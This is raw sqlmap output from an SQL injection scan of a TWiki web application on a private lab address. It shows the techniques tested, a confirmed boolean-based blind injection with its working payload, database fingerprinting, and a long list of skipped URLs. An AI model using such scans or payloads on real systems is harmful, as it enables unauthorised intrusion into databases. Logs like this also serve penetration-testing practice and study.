[20:23:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:24:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:24:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:24:01] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:24:01] [INFO] testing 'MySQL inline queries' | |
[20:24:01] [INFO] testing 'PostgreSQL inline queries' | |
[20:24:01] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:24:01] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:24:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:24:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:24:02] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:24:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:24:03] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:24:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:24:04] [INFO] testing 'Oracle AND time-based blind' | |
[20:24:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:24:05] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:24:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:24:16] [WARNING] GET parameter 't' is not injectable | |
[20:24:16] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 198: | |
GET http://192.168.1.113:80/twiki/bin/search/Sandbox/SearchResult?scope=text®ex=on&search=Web *Search[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:24:16] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Sandbox/SearchResult?scope=text®ex=on&search=Web *Search[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[20:24:16] [INFO] testing connection to the target URL | |
[20:24:16] [INFO] testing if the target URL is stable | |
[20:24:17] [INFO] target URL is stable | |
[20:24:17] [INFO] testing if URI parameter '#1*' is dynamic | |
[20:24:17] [WARNING] URI parameter '#1*' does not appear dynamic | |
[20:24:17] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[20:24:17] [INFO] testing for SQL injection on URI parameter '#1*' | |
[20:24:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:24:17] [WARNING] reflective value(s) found and filtering out | |
[20:24:19] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable | |
[20:24:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:24:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:24:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:24:19] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:24:19] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:24:19] [INFO] testing 'MySQL inline queries' | |
[20:24:19] [INFO] testing 'PostgreSQL inline queries' | |
[20:24:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:24:19] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:24:19] [WARNING] time-based comparison requires larger statistical model, please wait...... | |
[20:24:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:24:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:24:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:24:20] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:24:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:24:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:24:20] [INFO] testing 'Oracle AND time-based blind' | |
[20:24:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' | |
[20:24:20] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:24:20] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found | |
[20:24:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' | |
[20:24:24] [INFO] checking if the injection point on URI parameter '#1*' is a false positive | |
[20:24:25] [WARNING] it appears that the character '>' is filtered by the back-end server. You are strongly advised to rerun with the '--tamper=between' | |
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N | |
sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests: | |
--- | |
Parameter: #1* (URI) | |
Type: boolean-based blind | |
Title: AND boolean-based blind - WHERE or HAVING clause | |
Payload: http://192.168.1.113:80/twiki/bin/search/Sandbox/SearchResult?scope=text®ex=on&search=Web AND 2722=2722-- hRzySearch[^A-Za-z] | |
--- | |
do you want to exploit this SQL injection? [Y/n] Y | |
[20:24:25] [INFO] testing MySQL | |
[20:24:25] [WARNING] the back-end DBMS is not MySQL | |
[20:24:25] [INFO] testing Oracle | |
[20:24:25] [WARNING] the back-end DBMS is not Oracle | |
[20:24:25] [INFO] testing PostgreSQL | |
[20:24:25] [WARNING] the back-end DBMS is not PostgreSQL | |
[20:24:25] [INFO] testing Microsoft SQL Server | |
[20:24:25] [INFO] confirming Microsoft SQL Server | |
[20:24:26] [INFO] the back-end DBMS is Microsoft SQL Server | |
web server operating system: Linux Ubuntu 8.04 (Hardy Heron) | |
web application technology: Apache 2.2.8 | |
back-end DBMS: active fingerprint: Microsoft SQL Server 2012 | |
SQL injection vulnerability has already been detected against '192.168.1.113'. Do you want to skip further tests involving it? [Y/n] Y | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebSearch?skin=print' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Sandbox/WebSearch?rev1=1.7&rev2=1.6' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebSearch?rev=1.6' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Sandbox/WebSearch?rev1=1.6&rev2=1.5' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebSearch?rev=1.5' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Sandbox/WebSearch?template=oopsmore¶m1=1.7¶m2=1.7' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=text®ex=on&search=TopicClassification.*NoDisclosure' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=text®ex=on&search=TopicClassification.*PublicFAQ' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=text®ex=on&search=TopicClassification.*PublicSupported' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=text®ex=on&search=OperatingSystem.*OsHPUX' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=text®ex=on&search=OperatingSystem.*OsLinux' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=text®ex=on&search=OperatingSystem.*OsSolaris' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=text®ex=on&search=OperatingSystem.*OsSunOS' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=text®ex=on&search=OperatingSystem.*OsMacOS' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=text®ex=on&search=OperatingSystem.*OsWin' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=\.*' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^a' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^b' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^c' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^d' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^e' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^f' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^g' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^h' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^i' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^j' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^k' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^l' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^m' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^n' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^o' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^p' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^q' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^r' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^s' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^t' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^u' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^v' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^w' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^x' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^y' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&search=^z' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/?scope=topic®ex=on&bookview=on&search=\.*' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Know/WebSearch?t=1441457923' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/SearchResult?scope=text®ex=on&search=Web *Search[^A-Za-z]' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Know/WebSearch?skin=print' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Know/WebSearch?rev1=1.10&rev2=1.9' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Know/WebSearch?rev=1.9' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Know/WebSearch?rev1=1.9&rev2=1.8' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Know/WebSearch?rev=1.8' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Know/WebSearch?template=oopsmore¶m1=1.10¶m2=1.10' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=\.*' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^a' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^b' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^c' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^d' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^e' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^f' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^g' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^h' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^i' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^j' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^k' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^l' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^m' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^n' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^o' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^p' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^q' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^r' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^s' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^t' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^u' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^v' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^w' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^x' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^y' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=^z' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&bookview=on&search=\.*' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Main/WebSearch?t=1441457937' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=Web *Search[^A-Za-z]' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebSearch?skin=print' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebSearch?rev1=1.9&rev2=1.8' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebSearch?rev=1.8' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebSearch?rev1=1.8&rev2=1.7' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebSearch?rev=1.7' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Main/WebSearch?template=oopsmore¶m1=1.9¶m2=1.9' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Main/OfficeLocations?t=1441457963' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=Office *Locations[^A-Za-z]' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/OfficeLocations?skin=print' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/OfficeLocations?rev1=1.5&rev2=1.4' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/OfficeLocations?rev=1.4' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/OfficeLocations?rev1=1.4&rev2=1.3' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/OfficeLocations?rev=1.3' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Main/OfficeLocations?template=oopsmore¶m1=1.5¶m2=1.5' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/TWiki/GoodStyle?t=1441457963' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=Good *Style[^A-Za-z]' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/GoodStyle?skin=print' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/GoodStyle?rev1=1.7&rev2=1.6' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/GoodStyle?rev=1.6' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/GoodStyle?rev1=1.6&rev2=1.5' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/GoodStyle?rev=1.5' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/TWiki/GoodStyle?template=oopsmore¶m1=1.7¶m2=1.7' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Main/TWikiUsers?t=1441457976' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=TWiki *Users[^A-Za-z]' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?skin=print' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/TWikiUsers?rev1=1.16&rev2=1.15' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?rev=1.15' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/TWikiUsers?rev1=1.15&rev2=1.14' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiUsers?rev=1.14' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Main/TWikiUsers?template=oopsmore¶m1=1.16¶m2=1.16' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113/twiki/bin/attach/Main/WebHome?filename=pix.gif&revInfo=1' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Know/WebHome?t=1441458041' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Know/SearchResult?scope=text®ex=on&search=Web *Home[^A-Za-z]' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Know/WebHome?skin=print' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Know/WebHome?rev1=1.11&rev2=1.10' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Know/WebHome?rev=1.10' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Know/WebHome?rev1=1.10&rev2=1.9' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Know/WebHome?rev=1.9' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Know/WebHome?template=oopsmore¶m1=1.11¶m2=1.11' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Main/WebStatistics?t=1441458048' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=Web *Statistics[^A-Za-z]' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebStatistics?skin=print' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebStatistics?rev1=1.9&rev2=1.8' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebStatistics?rev=1.8' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebStatistics?rev1=1.8&rev2=1.7' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebStatistics?rev=1.7' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Main/WebStatistics?template=oopsmore¶m1=1.9¶m2=1.9' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/WebTopicEditTemplate?topicparent=Sandbox.WebPreferences' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/WebPreferences?t=1441458075' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/SearchResult?scope=text®ex=on&search=Web *Preferences[^A-Za-z]' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebPreferences?skin=print' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Sandbox/WebPreferences?rev1=1.11&rev2=1.10' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebPreferences?rev=1.10' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Sandbox/WebPreferences?rev1=1.10&rev2=1.9' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebPreferences?rev=1.9' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Sandbox/WebPreferences?template=oopsmore¶m1=1.11¶m2=1.11' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Main/WebIndex?t=1441458191' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text®ex=on&search=Web *Index[^A-Za-z]' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebIndex?skin=print' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebIndex?rev1=1.3&rev2=1.2' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebIndex?rev=1.2' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebIndex?rev1=1.2&rev2=1.1' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebIndex?rev=1.1' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/oops/Main/WebIndex?template=oopsmore¶m1=1.3¶m2=1.3' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.19' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.18' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.17' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.16' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.15' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiWeb?topicparent=Main.WebHome' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.14' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.13' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.12' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.11' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.10' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.9' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.8' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.7' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Main/?scope=topic®ex=on&search=.*' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.6' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Main/WelcomeGuest?topicparent=Main.WebHome' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Main/TWikiWeb?topicparent=Main.WebHome' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Main/GoodStyle?topicparent=Main.WebHome' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Main/TextFormattingRules?topicparent=Main.WebHome' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Main/TextFormattingFAQ?topicparent=Main.WebHome' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Main/TestArea?topicparent=Main.WebHome' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Main/TWikiPreferences?topicparent=Main.WebHome' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.5' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.4' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.3' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.2' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=r1.1' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113/twiki/bin/search/Sandbox/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=100' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113/twiki/bin/search/Sandbox/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=200' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113/twiki/bin/search/Sandbox/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=400' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113/twiki/bin/search/Sandbox/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=800' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113/twiki/bin/search/Sandbox/SearchResult?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/WebChanges?t=1441458304' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/Sandbox/SearchResult?scope=text®ex=on&search=Web *Changes[^A-Za-z]' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebChanges?skin=print' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Sandbox/WebChanges?rev1=1.3&rev2=1.2' | |
[20:24:26] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebChanges?rev=1.2' | |
